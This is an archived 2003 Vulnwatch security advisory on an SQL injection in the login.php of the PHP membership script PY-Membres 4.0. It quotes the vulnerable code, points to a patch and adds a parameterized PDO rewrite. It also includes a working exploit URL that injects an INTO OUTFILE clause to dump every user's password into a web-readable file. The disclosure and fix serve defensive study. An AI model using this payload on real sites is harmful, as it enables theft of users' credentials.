Vulnwatch mailing list archives

PY-Membres 4.0 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 06 Apr 2003 20:16:25 +0200







Information :
°°°°°°°°°°°°°
Website : http://www.py-scripts.com/
Tested version : 4.0
PHP Config : magic_quotes_gpc=OFF
Problem : SQL Injection



PHP Code/Location :
°°°°°°°°°°°°°°°°°°°

login.php :

------------------------------------------------------------------------
<?
session_start();
session_name("pys");
include("config.php");
include("functions.php");

est_vide($login,"Vous n\'avez pas saisi de login !");
est_vide($pass,"Vous n\'avez pas saisi de mot de passe !");
connexiondb();
$sql = "SELECT passwd FROM $db_table WHERE login='$login'";
$req = mysql_query($sql) or die('Erreur SQL !<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req);
if($data['passwd'] != $pass)
        {
        echo "<p>Mauvais login / password. Merci de recommencer</p>";
        mysql_close();
        exit;
        }
else
        {
        $ploginy=$login;
        session_register('ploginy');
        $ip=$REMOTE_ADDR;
        $host=gethostbyaddr($ip);
        $log=date("d/m/Y à H\hi | ");
        $log.=$ip." | ".$host;
        $action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE login='$ploginy'") or die (mysql_error()) ;
        mysql_close();
        Header("Location: membre.php");
        }
?>
------------------------------------------------------------------------





Exploit :
°°°°°°°°°
http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

will save all users' passwords into the file http://[target]/file.txt.


Solution :
°°°°°°°°°°
A patch can be found on http://www.phpsecure.info.


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°

http://www.frog-man.org/tutos/PY-Membres4.0.txt



frog-m () n
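
The login.php lookup quoted in the advisory, rewritten with a bound parameter, as an added example that is not part of the original post or of PY-Membres. The `membres` table name, the in-memory SQLite database and the sample row are assumptions made so it runs stand-alone, and it goes one step beyond the advisory by replacing the plaintext password comparison with `password_verify`.

```php
<?php
// Added example, not PY-Membres code. The column names mirror the advisory's
// query; the table name "membres" and the sample data are constructed.

function find_password_hash(PDO $db, string $login): ?string
{
    // $login is bound as a parameter, so a quote inside it cannot close the
    // string literal or append clauses such as INTO OUTFILE to the statement.
    $stmt = $db->prepare('SELECT passwd FROM membres WHERE login = :login');
    $stmt->execute([':login' => $login]);
    $hash = $stmt->fetchColumn();
    return $hash === false ? null : (string) $hash;
}

function check_login(PDO $db, $login, $pass): bool
{
    // Pass values in explicitly (for example from $_POST) rather than relying
    // on register_globals, and reject anything that is not a non-empty string.
    if (!is_string($login) || !is_string($pass) || $login === '' || $pass === '') {
        return false;
    }
    // Database errors surface as exceptions for the caller to log; the SQL
    // text is never echoed to the client as the original die() call does.
    $hash = find_password_hash($db, $login);
    return $hash !== null && password_verify($pass, $hash);
}

// Constructed demo database (assumption: pdo_sqlite is available).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE membres (login TEXT PRIMARY KEY, passwd TEXT, lastlog TEXT)');
$ins = $db->prepare('INSERT INTO membres (login, passwd) VALUES (?, ?)');
$ins->execute(['alice', password_hash('correct horse', PASSWORD_DEFAULT)]);

// The login value from the advisory, decoded. Here it is only ever compared
// against the login column as an ordinary string.
$advisoryLogin = "' OR ISNULL(NULL) INTO OUTFILE '/path/to/site/file.txt";

var_dump(check_login($db, 'alice', 'correct horse'));
var_dump(check_login($db, $advisoryLogin, '1'));
var_dump(check_login($db, 'alice', 'wrong'));
```

On MySQL, the account the application connects with should also not hold the FILE privilege, since that privilege is what `INTO OUTFILE` depends on.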